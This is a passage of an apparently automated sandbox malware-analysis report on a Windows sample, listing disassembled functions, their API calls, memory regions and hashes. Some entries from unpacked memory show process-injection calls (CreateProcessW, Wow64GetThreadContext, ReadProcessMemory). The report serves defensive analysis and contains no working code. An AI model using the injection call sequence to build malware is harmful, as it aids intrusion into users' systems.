GetOpenFileNameW.COMDLG32(?), ref: 0043EA83

Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770

Part of subcall function 00420791: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0

Strings

X, xrefs: 0043EA51

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
Instruction ID: baa1e7331fae4d359aac7897d23b5e8ce5a65ce190648e6f88e75d23560a4c0c
Opcode Fuzzy Hash: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
Instruction Fuzzy Hash: 4421A471A102589BCB41DF95D845BDE7BF8AF49314F00806FE508B7281DBB85989CFAA

Function 004698E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 004698F8
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0046990F

Strings

aut, xrefs: 00469909

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
Instruction ID: d76eb4abf93f0e171a782776cb2de2514a1bc3ee8d101bd4a6c1c3d5b9ef8161
Opcode Fuzzy Hash: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
Instruction Fuzzy Hash: D0D05E7954030DABDB50ABA0DC0EFDA773CE704700F0006F5BA54D10A1EAB1A5988BA9

Function 0047CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
Instruction ID: 208f182f3c9136cc863dec11eab3d0960db0a10b8073f2b3425ab1c058278d8f
Opcode Fuzzy Hash: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
Instruction Fuzzy Hash: 8AF13A716083019FC714DF29C480A6ABBE5FF88318F54892EF8999B392D734E945CF86

Function 00AF7DF0 Relevance: 4.6, APIs: 3, Instructions: 89COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32 ref: 00AF7E0F

Memory Dump Source

Source File: 00000000.00000002.1408264425.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_I3LPkQh2an.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 9af15faa8f017226f03fee95b7fceefc958e718ecb99ebfe56a682ec550d5c75
Instruction ID: e522379a62e3fe69d754001e3cce092b84824a9968668cc8ebc60eb18c16818b
Opcode Fuzzy Hash: 9af15faa8f017226f03fee95b7fceefc958e718ecb99ebfe56a682ec550d5c75
Instruction Fuzzy Hash: 4821F53564D34C7BEA3657D49C0AFBD7A346F61750FC8448AF788561D2D6A83C088A63

Function 0040434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00404370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00404432

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
Instruction ID: 448a70bf35e4549ae47872dc9eb977fea889799f7ce089bf6dae1479d4278b9a
Opcode Fuzzy Hash: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
Instruction Fuzzy Hash: 4E3184B05047019FD760DF24D884A9BBBF8FB98308F00093FEA9A92391D7746944CB5A

Function 0042571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00425733

Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A192
Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A19C

__NMSG_WRITE.LIBCMT ref: 0042573A

Part of subcall function 0042A1C8: GetModuleFileNameW.KERNEL32(00000000,004C33BA,00000104,00000000,00000001,00000000), ref: 0042A25A
Part of subcall function 0042A1C8: ___crtMessageBoxW.LIBCMT ref: 0042A308

Part of subcall function 0042309F: ___crtCorExitProcess.LIBCMT ref: 004230A5
Part of subcall function 0042309F: ExitProcess.KERNEL32 ref: 004230AE

Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28

RtlAllocateHeap.NTDLL(00C10000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
Instruction ID: 12628286b9c33790f0bcaf27d243d0f78d5a939af01e39ac9af769d2403f214a
Opcode Fuzzy Hash: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
Instruction Fuzzy Hash: 8101D235380B31DADA102B36BC42A2E67588BC2766FD0043FF9059A281DE7C9D01866D

Function 004698A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00469548,?,?,?,?,?,00000004), ref: 004698BB
SetFileTime.KERNEL32(00000000,?,00000000,?,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004698D1
CloseHandle.KERNEL32(00000000,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004698D8

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
Instruction ID: c759ec0fed9c3a555ac5ec6521767d99e991bc38b38178bd45d0c2782cb34c4e
Opcode Fuzzy Hash: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
Instruction Fuzzy Hash: 6EE08632140214B7D7212B54EC0DFDE7B19EB06760F144535FF14A90E087B12925979C

Function 00468D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00468D1B

Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B

_free.LIBCMT ref: 00468D2C
_free.LIBCMT ref: 00468D3E

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction ID: 6b151060fb8ed88ed9ffdc5938a612973e117ec8253147f08314cae1c0c73c84
Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction Fuzzy Hash: 10E0C2B170171253CB20A579BA40A8313DC4F4C3967440A0FB40DD7282DEACF842803C

Function 0040A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0043FC01

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: dfc4b9bb6d3e75c830fec079ffbc95046ec1c120a3343fa91d00179885e2200b
Instruction ID: c803bb07f2a617980fc862d1973d54e65b33ee20ceb4547c7cbfd92c67e19f3b
Opcode Fuzzy Hash: dfc4b9bb6d3e75c830fec079ffbc95046ec1c120a3343fa91d00179885e2200b
Instruction Fuzzy Hash: 8A225B70608301DFD724DF14C454A6AB7E1FF44308F15896EE98AAB3A2D739EC55CB8A

Function 004677B3 Relevance: 3.1, APIs: 2, Instructions: 133COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004678DB

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 3c6315685b18230a41db523489b843865efacec3c0a635d1b23e34ceb6c4029d
Instruction ID: 665aeeeda7618be144ab26ba5ea9c3b14b1a5e971dff4faecb2a1d88e99e5761
Opcode Fuzzy Hash: 3c6315685b18230a41db523489b843865efacec3c0a635d1b23e34ceb6c4029d
Instruction Fuzzy Hash: 8841D7716082059BCB10FFA9D8859BAB7E8EF49308B64445FE14597382EF3D9C05CB6A

Function 00407A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00407AAB
_memmove.LIBCMT ref: 00407B16

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: aa52f996f6a1e8cebf2e93e85435818c4b1739226e09e342898e130c21d93d86
Instruction ID: 2724e85abdc1188f3097b0ceee28e317ee468c7dcaf0b9eeda237b3ec1003ef0
Opcode Fuzzy Hash: aa52f996f6a1e8cebf2e93e85435818c4b1739226e09e342898e130c21d93d86
Instruction Fuzzy Hash: CB31C4B1B00506AFC704DF69D891E69B3A4FF48314715822AE519CB3D1EB38F911CB95

Function 00AD5A3B Relevance: 3.1, APIs: 2, Instructions: 61threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,00AD55C0,?,00000000,00000000), ref: 00AD5A51
RtlExitUserThread.NTDLL(00000000), ref: 00AD5B11

Memory Dump Source

Source File: 00000000.00000002.1408264425.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_I3LPkQh2an.jbxd

Similarity

API ID: Thread$CreateExitUser
String ID:
API String ID: 4108186749-0
Opcode ID: 82eccd49241ec15e7f3353b2222a813f913bdf892449e3740cb74b033c1e94aa
Instruction ID: e19c72f40e5694fec33a0a61f3c657253ecf1662f2e379f344c33868cbc2d43c
Opcode Fuzzy Hash: 82eccd49241ec15e7f3353b2222a813f913bdf892449e3740cb74b033c1e94aa
Instruction Fuzzy Hash: E4110611D0DBC14ED72387788825766BFA01F63720F5906DBD0928E2E3D269490893A3

Function 004047D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00404834

Part of subcall function 0042336C: __lock.LIBCMT ref: 00423372
Part of subcall function 0042336C: DecodePointer.KERNEL32(00000001,?,00404849,00457C74), ref: 0042337E
Part of subcall function 0042336C: EncodePointer.KERNEL32(?,?,00404849,00457C74), ref: 00423389

Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00404915
Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040492A

Part of subcall function 00403B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
Part of subcall function 00403B3A: IsDebuggerPresent.KERNEL32 ref: 00403B7A
Part of subcall function 00403B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
Part of subcall function 00403B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00404874

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
Instruction ID: 9525eea27cfe2a06ee6bb0b94f8a439f0fec78f72a1223afaaa4f4cc7b3f6ca0
Opcode Fuzzy Hash: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
Instruction Fuzzy Hash: 96118E729143019BC700EF69E80591EBBE8EB95754F10893FF440932B2DB749A49CB9E

Function 00420DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00C10000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F

std::exception::exception.LIBCMT ref: 00420DEC
__CxxThrowException@8.LIBCMT ref: 00420E01

Part of subcall function 0042859B: RaiseException.KERNEL32(?,?,00000000,004B9E78,?,00000001,?,?,?,00420E06,00000000,004B9E78,00409E8C,00000001), ref: 004285F0

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: a1c4870ae67c25cf443983c81cfea13b426b6c380140abe28f3bf244e2cf3b27
Instruction ID: 7ce0db18d3e86308d2e94e4ef4c1f65fcbea9f9514d772724804ad69f7891851
Opcode Fuzzy Hash: a1c4870ae67c25cf443983c81cfea13b426b6c380140abe28f3bf244e2cf3b27
Instruction Fuzzy Hash: BAF0863560223976CB10BA95FD015DF7BE89F01315F90452FF90496282DFB89A8091DD

Function 004253A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28

__lock_file.LIBCMT ref: 004253EB

Part of subcall function 00426C11: __lock.LIBCMT ref: 00426C34

__fclose_nolock.LIBCMT ref: 004253F6

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
Instruction ID: fafcd99f2ade88ab86af259f2ce8aa17897398df1327fb2dd29172a4384519b5
Opcode Fuzzy Hash: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
Instruction Fuzzy Hash: 56F09C71B026249AD710BF66780579D66E06F41378FA1914FE814E71C1CFBC49419B5E

Function 00AD5D20 Relevance: 2.5, APIs: 2, Instructions: 38COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00AD5D6D

Memory Dump Source

Source File: 00000000.00000002.1408264425.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_I3LPkQh2an.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: d314d85811c41aed1a39602cb6ec7f125a9d288e3e9c3c75a3dfd5feb0a30391
Instruction ID: e534568f7b820def0d4c38b5e9428db97e171b3409e8f486f2a4904a02de35f5
Opcode Fuzzy Hash: d314d85811c41aed1a39602cb6ec7f125a9d288e3e9c3c75a3dfd5feb0a30391
Instruction Fuzzy Hash: 40F09651D04F04B6DE7EC7B8E94DB713A536B12714F4C4147A6E31A3B286512C15C132

Function 00E86A7D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 00E8723B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E872D1
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00E872F3

Memory Dump Source

Source File: 00000000.00000002.1409377799.0000000000E85000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E85000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e85000_I3LPkQh2an.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction ID: ac377952d091df20719e1955624798068f8849cbbedc61ae579d11c71d338eb6
Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
Instruction Fuzzy Hash: A312C024E18658C6EB24DF64D8507DEB232FF68300F1064E9910DEB7A5E77A4E81CF5A

Function 00AD5F10 Relevance: 1.7, APIs: 1, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1408264425.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_I3LPkQh2an.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf0c270326acc2c26989dcaec4525d53b4b8f6881fb9eb708be334755e47731e
Instruction ID: e98b0593b37bd2c8b718377068efed41bca5f879dcc87f2db59819110c4fdf22
Opcode Fuzzy Hash: cf0c270326acc2c26989dcaec4525d53b4b8f6881fb9eb708be334755e47731e
Instruction Fuzzy Hash: 3F71F231C0CF809EC73A97388408675BBB16B6A321F4D869BD0978F3E2DA758D448792

Function 00AD6490 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1408264425.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_I3LPkQh2an.jbxd

Similarity

API ID:
String ID:
